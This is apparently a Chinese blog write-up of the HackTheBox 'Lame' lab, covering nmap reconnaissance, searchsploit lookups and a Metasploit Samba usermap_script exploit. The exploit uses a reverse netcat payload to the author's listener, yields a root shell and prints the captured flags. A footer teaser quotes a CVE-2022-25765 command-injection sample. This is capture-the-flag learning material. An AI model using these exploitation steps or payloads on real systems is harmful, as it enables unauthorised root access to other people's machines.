首页 > 其他分享 >Hackthebox Lame

Hackthebox Lame

时间:2023-07-11 23:00:52浏览次数:33  
标签:samba Lame -- script makis Hackthebox exploit root

Hackthebox Lame

NMAP Scanning

──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 10:06 EDT
Nmap scan report for localhost (10.129.145.147)
Host is up (0.25s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  �m V      Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-07-11T10:21:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h09m07s, deviation: 2h49m46s, median: 9m04s
|_smb2-time: Protocol negotiation failed (SMB2)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit vsftpd 2.3.4                                  
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                  | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                     | unix/remote/17491.rb

虽然metasploit模块,但是却执行失败。

其实在NMAP扫描结果可知samba的版本:

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit samba 3.0.20            
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                     | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                           | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                              | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

在Metasploit中也有samba的漏洞利用模块:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options 

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.62
LHOST => 10.10.14.62
msf6 exploit(multi/samba/usermap_script) > set LPORT  5555
LPORT => 5555
msf6 exploit(multi/samba/usermap_script) > set RHOSTS  10.129.145.147
RHOSTS => 10.129.145.147
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.62:5555 
[*] Command shell session 1 opened (10.10.14.62:5555 -> 10.129.145.147:49206) at 2023-07-11 10:36:57 -0400

id   
uid=0(root) gid=0(root)



root@lame:/root# cat root.txt
09a885cf7c8bfbd4d21cbffe69eef798
root@lame:/home# cd makis
root@lame:/home/makis# ls -alh
total 28K
drwxr-xr-x 2 makis makis 4.0K Mar 14  2017 .
drwxr-xr-x 6 root  root  4.0K Mar 14  2017 ..
-rw------- 1 makis makis 1.1K Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2.9K Mar 14  2017 .bashrc
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Jul 11 10:08 user.txt
root@lame:/home/makis# cat user.txt
bf43559a3fed24e30fe5cbfdafef3c67

经验教训

  1. 对于Samba服务,不能想当然的就以为通过smbclient命令获得共享目录,或者enum4linux获取可能的用户名,而是要注意其版本号,看是否存在相关的漏洞

  2. 对vsftpd 2.3.4漏洞,一看到是该版本,就错误的认为突破点应该就在该服务上,但是本靶机的结果表明这样先入为主的想法是完全错误的。

标签:samba,Lame,--,script,makis,Hackthebox,exploit,root
From: https://www.cnblogs.com/jason-huawen/p/17546193.html

相关文章

  • hackthebox precious easy
    常规进行信息收集以及开放端口访问80进行探测主页有一个html2pdf的功能探测一下正常业务看看是否存命令执行等正常业务下载好文件后,利用exiftools查看该pdf的信息发现发现powerbypdfkitv8.6.0存在CVE-2022-25765PDFKit.new("http://example.com/?name=#{'%20`sleep5`'......
  • Ubuntu - Add a Flameshot Icon for taking screenshot directly to Applications men
    Allapplications'desktopentriescanbefoundin/usr/share/applications.Youcancreateadesktopentryunder~/.local/share/applicationstomakeyourownicon.zzh@ZZHPC:/usr/share/applications$sudocporg.flameshot.Flameshot.desktop~/.local/sh......
  • hackthebox flight insane
    主机发现nmap-sV-sC-oNflight10.10.11.18788端口开放所以是一个域环境tips:在域环境中,只要与kerberos相关的事情,必须要与域环境中的时间一致域环境smbenum主机头由于开放了445端口,首先用cme枚举445端口cmd--help枚举可用常规选项cmesmb--help查看smb内的选项......
  • hackthebox sniper medium
    主机发现nmap--min-rate1000-p-10.10.10.151发现80和445端口端口探测首先利用smbclient进行端口探测smbclient-L//10.10.10.151连接错误(后面发现是因为本地smb配置错误导致的)切换方向访问80端口发现是一个类似博客的页面鼠标悬浮可以查看到左下角的悬浮跳......
  • Don't Blame Me (dp问题)
    大意:有一个数组a,其中a[i]<64,问你子序列中异或值中1的个数为k的子序列个数题解:由于数组a的值很小异或后也很小,所以可以暴力dp公式:dp[i][j]//表示前i个数中异或值为j的子序列个数dp[i][a[i]&j]=dp[i-1][j]+dp[i][a[i]&j];核心:每次遍历当前a[i]与0~(1<<6)异或值的大小,更新dp......
  • hackthebox --interface medium
    主机发现nmap-sV-sC-O-p22,8010.10.11.200-oNports 访问80页面,主页面是这样的 再访问一下index.php或者index.html发现是404错误,有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露利用f12查看js源码搜索http://或者/或者/upload这里......
  • hackthebox --aragog
    主机发现与爆破nmap-sT--min-rate1000010.10.10.78nmap-sT-sV-sC-O-p22,21,8010.10.10.78 发现有ftp匿名登陆└─$ftp10.10.10.78Connectedto10.10.10.78.220(vsFTPd3.0.3)Name(10.10.10.78:kali):anonymous230Loginsuccessful.Remotesystemtypeis......
  • HackTheBox-Lame
    nmap扫一下端口┌──(kali㉿kali)-[~/htb/lame]└─$catnmap.txt#Nmap7.93scaninitiatedSatApr2200:01:102023as:nmap-n-v-sC-sV-oNnmap.txt-Pn10.10.10.3Nmapscanreportfor10.10.10.3Hostisup(0.55slatency).Notshown:996filteredtcp......
  • HackTheBox-Holiday
    Reconnaissancenmap通过nmap扫描发现了靶机只存在ssh和Node.js框架下的http服务。进入网站首页并没有发现什么有用的信息。#Nmap7.92scaninitiatedTueApr1807:38:062023as:nmap-Pn-sV-sC-A-oNnmap.txt10.10.10.25Nmapscanreportfor10.10.10.25Hostis......
  • Autodesk Flame 2024 for mac(高级 3D 视觉效果) v2024激活版
    AutodeskFlame2024中文版提供用于快速、交互式3D视觉效果、精加工、合成、高级图形、颜色分级、整合、编辑和外观开发的工具。3D合成(动作)结合了传统2D合成的交互速度和强大的3D视觉效果。包括会话中艺术家的WYSIWYG预览。Flame2024中文版功能特色基于节点的合成(批处理......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99